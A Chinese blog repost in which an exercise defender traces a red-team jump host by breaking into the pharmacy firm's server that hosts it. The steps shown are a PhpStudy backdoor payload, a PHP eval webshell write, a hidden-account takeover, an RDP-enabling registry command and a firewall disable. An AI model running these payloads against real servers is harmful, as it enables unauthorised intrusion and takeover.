实战 | HW防守方溯源红队跳板
2022-8-6 12:34:6 Author: 白帽子左一(查看原文) 阅读量:38 收藏

扫码领资料

获黑客教程

免费&进群

在hw期间,通过监测设备发现一个攻击IP,其资产为某药房企业,疑似为红队跳板,经过溯源,最终确定为该IP为红队跳板,感觉本次溯源有不少收获,且很有意思,因此将溯源过程记录下来。

1.首先访问其官网,发现服务器返回信息显示其使用了PHP/5.4.45,想到如果是利用PhpStudy工具,可能存在后门漏洞

2.查看之前的博客《PhpStudy后门漏洞》,构造payload,将Accept-Charset字段修改为base64加密的命令“phpinfo();”

3.根据结果看出确实存在PhpStudy解析漏洞,根据路径猜测其为Windows操作系统,执行base64加密的命令“echo system("net user");”

4.探测网站根目录,执行base64加密的命令“echo system("dir");”

5.下载安装PhpStudy工具,发现网站根目录都为www目录

猜测目标根目录为“D:\phpStudy\WWW\”,创建文件写入一句话木马,base64加密“$fp=fopen('D:\phpStudy\WWW\index2.php',"w+");fputs($fp,'<?php eval($_POST[\'index2\']);?>');fclose($fp);”

6.用工具进行连接马文件

7.探测开放端口信息,未开启3389端口

8.创建隐藏用户admin$发现已经被创建,可通过修改密码,开启3389端口,远程登录

PS:动作太大,不推荐,创建新用户后,远程连接新账号返回“远程登录时出现windows不能让您远程登录,因为不能加载您的配置文件”,才使用这种方法

开启3389端口:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭防火墙(操作系统版本从PHPinfo截图可知为Windows Server 2003):

netsh firewall set opmode mode=disable

9.远程连接,确定为红队攻击跳板

作者:chaojixiaojingang原文链接https://blog.csdn.net/qq_36197704/article/details/116941571

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

@
学习更多渗透技能!体验靶场实战练习

hack视频资料及工具

(部分展示)

往期推荐

给第一次做渗透项目的新手总结的一些感悟

「登陆页面」常见的几种渗透思路与总结!

突破口!入职安服后的经验之谈

红队渗透下的入口权限快速获取

攻防演练|红队手段之将蓝队逼到关站!

CNVD 之5000w通用产品的收集(fofa)

自动化挖掘cnvd证书脚本

Xray捡洞中的高频漏洞

实战|通过供应链一举拿下目标后台权限

实战|一次真实的域渗透拿下域控(内网渗透)

看到这里了,点个“赞”、“再看”


文章来源: http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247573353&idx=1&sn=87cceac3d8d567126980f095f8da3cf5&chksm=ebeb9644dc9c1f522fa3ec77a2f78ea04381220681008beee2ca1e16384497d11e8068ef9a30#rd
如有侵权请联系:admin#unsafe.sh